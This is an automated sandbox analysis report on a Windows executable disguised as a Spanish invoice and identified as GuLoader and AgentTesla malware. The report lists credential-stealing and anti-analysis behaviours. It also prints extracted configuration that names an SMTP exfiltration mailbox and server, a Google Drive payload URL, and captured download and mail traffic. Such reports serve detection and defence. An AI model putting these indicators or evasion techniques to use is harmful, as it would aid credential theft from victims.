Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 184285013-044310-Factura pendiente (2).exe

Overview

General Information

Sample Name:184285013-044310-Factura pendiente (2).exe
Analysis ID:533171
MD5:05bee3772cc551cbbab5d5d8bd125015
SHA1:4e4f69aff7d883e4ad0e612b415cb6b49d90098a
SHA256:aa017fd080982ca27d62f3d0e433b8f73898978487c5139ff6ab187a7dd11888
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • 184285013-044310-Factura pendiente (2).exe (PID: 5644 cmdline: "C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe" MD5: 05BEE3772CC551CBBAB5D5D8BD125015)
    • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • CasPol.exe (PID: 4576 cmdline: "C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "info@malkaratso.org.trMto1903mail.malkaratso.org.trwilliamsmith8135@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downloa"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.151832663827.0000000000B00000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: CasPol.exe PID: 4576JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: CasPol.exe PID: 4576JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000005.00000000.151832663827.0000000000B00000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloa"}
            Source: conhost.exe.4940.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "info@malkaratso.org.trMto1903mail.malkaratso.org.trwilliamsmith8135@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: 184285013-044310-Factura pendiente (2).exeVirustotal: Detection: 55%Perma Link
            Source: 184285013-044310-Factura pendiente (2).exeReversingLabs: Detection: 64%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E65220 CryptUnprotectData,5_2_00E65220
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E65868 CryptUnprotectData,5_2_00E65868
            Source: 184285013-044310-Factura pendiente (2).exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.212.129:443 -> 192.168.11.20:49808 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=downloa
            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 212.83.130.20 212.83.130.20
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/lglu03i2is66lao2nkn5tgms2vaqhaoo/1638516225000/01591657853412424088/*/1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-7o-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49824 -> 212.83.130.20:587
            Source: global trafficTCP traffic: 192.168.11.20:49824 -> 212.83.130.20:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpString found in binary or memory: http://UEjXzO.com
            Source: CasPol.exe, 00000005.00000002.156748159231.000000001DDCF000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156745620906.000000001DA6E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: CasPol.exe, 00000005.00000002.156736867807.0000000001027000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.153195967743.0000000001027000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.151982167835.000000000103C000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.151987339139.0000000001035000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.152273164107.0000000001027000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000005.00000002.156755780879.0000000020C60000.00000004.00000010.sdmp, CasPol.exe, 00000005.00000002.156748159231.000000001DDCF000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156745620906.000000001DA6E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: CasPol.exe, 00000005.00000002.156745452230.000000001DA3F000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156755780879.0000000020C60000.00000004.00000010.sdmp, CasPol.exe, 00000005.00000002.156748159231.000000001DDCF000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156745620906.000000001DA6E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: CasPol.exe, 00000005.00000002.156736867807.0000000001027000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.153195967743.0000000001027000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.151982167835.000000000103C000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.151987339139.0000000001035000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.152273164107.0000000001027000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000005.00000002.156748159231.000000001DDCF000.00000004.00000001.sdmpString found in binary or memory: http://mail.malkaratso.org.tr
            Source: CasPol.exe, 00000005.00000002.156748159231.000000001DDCF000.00000004.00000001.sdmpString found in binary or memory: http://malkaratso.org.tr
            Source: CasPol.exe, 00000005.00000002.156745452230.000000001DA3F000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156755780879.0000000020C60000.00000004.00000010.sdmp, CasPol.exe, 00000005.00000002.156748159231.000000001DDCF000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156745620906.000000001DA6E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: CasPol.exe, 00000005.00000003.151982167835.000000000103C000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 00000005.00000003.151982167835.000000000103C000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 00000005.00000003.152273932813.0000000000FFC000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156736526427.0000000000FF4000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000003.151982167835.000000000103C000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000003.151987339139.0000000001035000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-7o-docs.googleusercontent.com/
            Source: CasPol.exe, 00000005.00000003.151987339139.0000000001035000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-7o-docs.googleusercontent.com/&GNJ
            Source: CasPol.exe, 00000005.00000003.152273164107.0000000001027000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-7o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/lglu03i2
            Source: CasPol.exe, 00000005.00000002.156736207666.0000000000FBB000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000005.00000002.156734981903.0000000000CD0000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156736526427.0000000000FF4000.00000004.00000020.sdmp, CasPol.exe, 00000005.00000003.151982167835.000000000103C000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8
            Source: CasPol.exe, 00000005.00000003.151982167835.000000000103C000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8TAraarygL-AhCegsw
            Source: CasPol.exe, 00000005.00000002.156747802058.000000001DD98000.00000004.00000001.sdmpString found in binary or memory: https://fi8FzJdqylCZNRsVheXc.net
            Source: CasPol.exe, 00000005.00000002.156747802058.000000001DD98000.00000004.00000001.sdmpString found in binary or memory: https://fi8FzJdqylCZNRsVheXc.netD/
            Source: CasPol.exe, 00000005.00000002.156747802058.000000001DD98000.00000004.00000001.sdmpString found in binary or memory: https://fi8FzJdqylCZNRsVheXc.nett-
            Source: CasPol.exe, 00000005.00000002.156747439081.000000001DD52000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000005.00000002.156745452230.000000001DA3F000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156755780879.0000000020C60000.00000004.00000010.sdmp, CasPol.exe, 00000005.00000002.156748159231.000000001DDCF000.00000004.00000001.sdmp, CasPol.exe, 00000005.00000002.156745620906.000000001DA6E000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: CasPol.exe, 00000005.00000002.156747439081.000000001DD52000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 00000005.00000002.156746824009.000000001DCD1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/lglu03i2is66lao2nkn5tgms2vaqhaoo/1638516225000/01591657853412424088/*/1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-7o-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.212.129:443 -> 192.168.11.20:49808 version: TLS 1.2
            Source: 184285013-044310-Factura pendiente (2).exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 2_2_004044022_2_00404402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00A411305_2_00A41130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00A4BA505_2_00A4BA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00A43A505_2_00A43A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00A4C7B05_2_00A4C7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00A443205_2_00A44320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00A437085_2_00A43708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00AA6D905_2_00AA6D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00AA07E05_2_00AA07E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E2A09B5_2_00E2A09B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E2B2C85_2_00E2B2C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E27A285_2_00E27A28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E244F85_2_00E244F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E265185_2_00E26518
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E2B2695_2_00E2B269
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E2F7805_2_00E2F780
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E6880D5_2_00E6880D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E6E2DF5_2_00E6E2DF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E61BD05_2_00E61BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E6C3985_2_00E6C398
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E600405_2_00E60040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E67B405_2_00E67B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E62DA05_2_00E62DA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1DB15E085_2_1DB15E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1DB146C45_2_1DB146C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1DB15DC15_2_1DB15DC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1DB16AF15_2_1DB16AF1
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152010786406.0000000002A20000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameChechakos.exeFE2XCorps vs 184285013-044310-Factura pendiente (2).exe
            Source: 184285013-044310-Factura pendiente (2).exe, 00000002.00000002.152009405922.0000000000424000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameChechakos.exe vs 184285013-044310-Factura pendiente (2).exe
            Source: 184285013-044310-Factura pendiente (2).exeBinary or memory string: OriginalFilenameChechakos.exe vs 184285013-044310-Factura pendiente (2).exe
            Source: 184285013-044310-Factura pendiente (2).exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: 184285013-044310-Factura pendiente (2).exeVirustotal: Detection: 55%
            Source: 184285013-044310-Factura pendiente (2).exeReversingLabs: Detection: 64%
            Source: 184285013-044310-Factura pendiente (2).exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe "C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe"
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeFile created: C:\Users\user\AppData\Local\Temp\~DF28F216F37AAFE815.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/2@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000005.00000000.151832663827.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 2_2_004058D3 push ecx; ret 2_2_004058E7
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 2_2_004063AC push cs; iretd 2_2_00406417
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 2_2_02283E6E pushfd ; iretd 2_2_02283E86
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 2_2_02281A82 push AA7F6F8Bh; retf 2_2_02281A8B
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 2_2_02281B66 push eax; ret 2_2_02281B67
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeCode function: 2_2_02281BC2 push esp; ret 2_2_02281BC3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E298B1 push es; retf 5_2_00E298B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E22177 push edi; retn 0000h5_2_00E22179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E21610 push FFFFFF89h; retf 5_2_00E21614
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E29A10 push 00000005h; retf 5_2_00E29A14
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E6015B push esp; retf 5_2_00E60162
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E60114 push esp; retf 5_2_00E60115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E60312 push 8BFFFFFFh; retf 5_2_00E60318
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_00E6DC23 push edi; ret 5_2_00E6DC26
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\184285013-044310-Factura pendiente (2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
